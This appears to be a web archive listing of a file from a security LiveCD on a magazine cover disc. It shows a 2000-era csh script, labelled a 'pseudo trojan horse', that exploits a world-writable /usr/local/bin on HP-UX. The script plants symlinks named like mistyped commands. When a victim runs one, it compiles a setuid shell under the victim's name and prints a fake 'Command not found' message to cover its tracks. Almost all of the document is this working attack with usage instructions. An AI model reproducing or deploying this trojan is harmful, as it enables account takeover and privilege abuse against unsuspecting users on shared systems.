Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / hpux / local / hupux.sh < prev next >

Wrap

Linux/UNIX/POSIX Shell Script | 2005-02-12 | 2KB | 31 lines

#!/bin/csh # This little script file, if named properly and left in the # /usr/local/bin directory acts as a pseudo trojan horse on # HP-UX systems with world writable /usr/local/bin directories, # and /usr/local/bin in all users paths. This is the default shipping # on all recent HP-UX versions (well, on the vanila A.09.04 # it is world writable, which is brand new). Continue(Y/n/c)? # This script provided for informational purposes, and will create the # file shell.<user> when run. # # Suggested links (this is in /usr/local/bin): #lrwxr-x--- 1 bin bin 2 Feb 28 13:55 dir -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:33 la -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:33 ls- -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-al -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-l -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-la -> sl #lrwxr-x--- 1 bin bin 2 Feb 28 13:28 setenv -> sl #-rwxrwxrwx 1 bin bin 796 Feb 28 14:00 sl # # note: create this file (sl in above example), then create all the links # you want with - "ln -s sl dir", then "chgrp bin dir" and "chown bin dir" # and just wait for some unsuspecting user to run the program by mistake. cat > /usr/local/bin/bug.c << EOF main(argc,argv) int argc; char *argv[]; { execv("/bin/sh",argv); } EOF cc -o /usr/local/bin/shell.`whoami` /usr/local/bin/bug.c rm -f /usr/local/bin/bug.c chmod 5777 /usr/local/bin/shell.`whoami` echo $0 | awk '{ split($0,cmd,"/"); print cmd[5], ": Command not found." }' # www.hack.co.za [2000]#